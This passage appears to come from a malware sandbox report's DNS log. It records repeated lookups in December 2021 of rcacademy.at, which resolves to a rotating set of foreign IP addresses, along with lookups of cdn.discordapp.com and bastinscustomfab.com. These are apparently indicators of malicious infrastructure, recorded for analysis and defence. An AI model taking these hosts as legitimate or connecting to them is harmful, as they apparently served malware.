                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET8.8.8.8192.168.2.60x585eNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET8.8.8.8192.168.2.60xc892No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET8.8.8.8192.168.2.60xee2eNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET8.8.8.8192.168.2.60xf6b9No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET8.8.8.8192.168.2.60xf0ffNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET8.8.8.8192.168.2.60x417cNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET8.8.8.8192.168.2.60x242No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET8.8.8.8192.168.2.60xae03No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET8.8.8.8192.168.2.60x9e40No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET8.8.8.8192.168.2.60x7a74No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET8.8.8.8192.168.2.60xc9f5No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:00.383413076 CET8.8.8.8192.168.2.60xc26fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:00.383413076 CET8.8.8.8192.168.2.60xc26fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:00.383413076 CET8.8.8.8192.168.2.60xc26fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:00.383413076 CET8.8.8.8192.168.2.60xc26fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:00.383413076 CET8.8.8.8192.168.2.60xc26fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET8.8.8.8192.168.2.60x7dfbNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET8.8.8.8192.168.2.60xadfcNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET8.8.8.8192.168.2.60xedbbNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET8.8.8.8192.168.2.60xc1e3No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET8.8.8.8192.168.2.60xbe6No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:12.752821922 CET8.8.8.8192.168.2.60x23caNo error (0)bastinscustomfab.com50.62.140.96A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:14.026331902 CET8.8.8.8192.168.2.60xb47dNo error (0)www.bastinscustomfab.combastinscustomfab.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:14.026331902 CET8.8.8.8192.168.2.60xb47dNo error (0)bastinscustomfab.com50.62.140.96A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
